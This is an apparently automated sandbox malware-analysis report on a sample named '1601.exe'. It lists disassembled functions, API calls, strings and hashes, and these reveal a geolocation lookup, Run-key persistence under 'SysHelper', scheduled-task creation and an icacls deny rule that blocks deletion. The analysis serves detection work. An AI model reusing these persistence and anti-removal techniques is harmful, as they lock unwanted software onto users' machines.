__calloc_crt.LIBCMT ref: 04A16700
__get_sys_err_msg.LIBCMT ref: 04A1671E
__invoke_watson.LIBCMT ref: 04A1673B
__get_sys_err_msg.LIBCMT ref: 04A1676D
__invoke_watson.LIBCMT ref: 04A1678B

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
String ID:
API String ID: 4066021419-0
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: 65c2949d0b5cd56c58eea274fec8dbf0e06725b60f31d154a2cd59ff452fdb6b
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 0011C1B26006187BFB257B299D40BBA779CDF406A8F010436FE18E6661F621FD0043E4

Uniqueness

Uniqueness Score: -1.00%

Function 04962670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 049626DB
_memset.LIBCMT ref: 04962A30
_memset.LIBCMT ref: 04962AC0

Strings

D, xrefs: 04962AC8

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: b6ef2efe8a27bc98039e867803088c966bc09c54b1b467ebeeecda71917ae830
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 7FE14D71D4021AABDF24EFA0DD49FEEB7B8BF04304F1444BAE50AA6190EB746A45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0495D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0495D8EA

Strings

, xrefs: 0495DADB
(, xrefs: 0495DAE9
$, xrefs: 0495DAE2

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 918128d467fea91b1fcdbbf151d4010c95dbb3441d41de5f3526078da708056c
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 7991A071D00219EEEF20DFA0CC55BEEBBB5AF05304F248169D80577290DBB66A48CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04975CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsnlen.LIBCMT ref: 04975CF4

Strings

U, xrefs: 04975CFD

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction ID: 07c63beb8bf51a742edad39240a1c4ba4b42f9ef6b15aaaf8a46acc24c9d449d
Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction Fuzzy Hash: 6D212732248208BAFB409AA8DC49BBE73ACDB85670F614579F908C6590FA70FD4087A4

Uniqueness

Uniqueness Score: -1.00%

Function 0496A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0496A858
_memset.LIBCMT ref: 0496A869
_memset.LIBCMT ref: 0496A87A

Strings

p2Q, xrefs: 0496A882

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 4c00177bd6b5788c773a9d63da536b0a7da9ee46ecf0a5f9d20c94cf45eaa7d5
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: 05F0ED78698750A9F7217750FC26B857E917B31B0CF108098E1182E2E1D3FD338CA79A

Uniqueness

Uniqueness Score: -1.00%

Function 0499FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0499FBF1

Part of subcall function 0498169C: std::exception::_Copy_str.LIBCMT ref: 049816B5

__CxxThrowException@8.LIBCMT ref: 0499FC06

Strings

TeM, xrefs: 0499FBFE
TeM, xrefs: 0499FBFB, 0499FBE7

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
String ID: TeM$TeM
API String ID: 3662862379-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: 116051cdfb66a961beab272d07634dbcc114816df6259b388e50edb268d76826
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06775C0020CBBDB00FFA9D45ACDEBBB8AA44348F008466A95497241EA74A74A8B94

Uniqueness

Uniqueness Score: -1.00%

Function 0495D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 0497197D: __wfsopen.LIBCMT ref: 04971988

_fgetws.LIBCMT ref: 0495D15C

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 5b1ec2843df3d4a4b9008f007db76fde58429e9caa80adc39bd54412ced6c60e
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: EC91C371D00219ABEF20DFA4DC45BAEB7B9BF44308F244639EC15A3260E775BA44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0495D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0495D77E
_malloc.LIBCMT ref: 0495D7B2
_malloc.LIBCMT ref: 0495D7C1
_fprintf.LIBCMT ref: 0495D815

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: d324862ffed6554b79a02604e51f3a0fe04bc59f1a92507a8a28de31788042a9
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: A0A19EB0C00249EBFF11EFA4C849BDEBBB5AF50308F144178D50676291D7B66A58CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 04972AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04972B2E
__read_nolock.LIBCMT ref: 04972BFE
__filbuf.LIBCMT ref: 04972C21
_memset.LIBCMT ref: 04972C65

Part of subcall function 04975BA8: __getptd_noexit.LIBCMT ref: 04975BA8

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: 83d14fc4b8f8229b8b837fc44d0b518f79c232883210cadf946ba64d5c369ce8
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: 8A51A474B20305DFDB298F69888466E7BB9AF51324F1887F9E835962D0E770B950CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04991359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0499137D

Part of subcall function 04991A9D: __fltout2.LIBCMT ref: 04991AC6

__cftog_l.LIBCMT ref: 049913A3
__cftoe_l.LIBCMT ref: 049913D5

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 553a3954c250d784a5f93e1f2f5a130965a2d5eac7f44131d710dcf7229b4b3f
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: DF014E3640014ABBEF125E88DC02CED3FB6BB59355F488525FE9958530D337E9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 04A17A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 04A17A4B

Part of subcall function 04A18140: ___BuildCatchObjectHelper.LIBCMT ref: 04A18172
Part of subcall function 04A18140: ___AdjustPointer.LIBCMT ref: 04A18189

_UnwindNestedFrames.LIBCMT ref: 04A17A62
___FrameUnwindToState.LIBCMT ref: 04A17A74
CallCatchBlock.LIBCMT ref: 04A17A98

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: 6f197ab87812a5358f153d02914134f0d943ea0efcdc90c42ffb7cb1c3cc899f
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: 9D01E936000109BBDF12AF55CD04EDA7BBAFF48758F159015FD1866130D736E9A1DBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1601.exePID: 5136, Parent PID: 8176COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	37.1%
Total number of Nodes:	806
Total number of Limit Nodes:	91

Executed Functions

Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON

Download Yara Rule

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0070B2F0,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

D:\Program Files (x86)\Google\, xrefs: 0041B085
F:\, xrefs: 0041B397
<, xrefs: 0041A67B
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
IsNotAutoStart, xrefs: 0041A645
C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
--AutoStart, xrefs: 0041A2EC
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
X1P, xrefs: 0041A485
D:\Windows\, xrefs: 0041AFF3
--Admin, xrefs: 0041A1B4, 0041A632
--ForNetRes, xrefs: 0041A22E
x*P, xrefs: 0041ACE4
list<T> too long, xrefs: 0041B669, 0041B673
runas, xrefs: 0041A6CE
D:\Program Files\Google\, xrefs: 0041B0EE
--Task, xrefs: 0041A2CD
IsAutoStart, xrefs: 0041A1D0, 0041A273
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
C:\Program Files\Google\, xrefs: 0041AFB9
%username%, xrefs: 0041B283
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
I:\5d2860c89d774.jpg, xrefs: 0041B32F
--Service, xrefs: 0041A30B
IsNotTask, xrefs: 0041A654
x2Q, xrefs: 0041A856
C:\Windows\, xrefs: 0041AE0F
IsTask, xrefs: 0041A1EE, 0041A299
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
7P, xrefs: 0041B164

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-3144399390
Opcode ID: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

Author Name, xrefs: 0040D4C8
PT5M, xrefs: 0040D5A1, 0040D66C
--Task, xrefs: 0040D8DD
%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
Time Trigger Task, xrefs: 0040D43C, 0040D973
Trigger1, xrefs: 0040D6FA
2030-05-02T08:00:00, xrefs: 0040D737

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

Psapi.dll, xrefs: 0041228C
EnumProcessModules, xrefs: 0041226C, 004122A1
EnumProcesses, xrefs: 00412264, 00412299
GetModuleBaseNameW, xrefs: 00412277, 004122AC
kernel32.dll, xrefs: 0041224E

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

https://api.2ip.ua/geo.json, xrefs: 0040CF79
Microsoft Internet Explorer, xrefs: 0040CF5A
"country_code":", xrefs: 0040CFE1

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

SysHelper, xrefs: 00411D5B, 004120EB
SHGetFolderPathW, xrefs: 00411E9F
D, xrefs: 00412128
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
" --AutoStart, xrefs: 00411DD1
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
" --AutoStart, xrefs: 004120C2
Shell32.dll, xrefs: 00411E94
icacls ", xrefs: 0041214C

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_1601.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779

Memory Dump Source

Source File: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1747434458.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1747434458.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

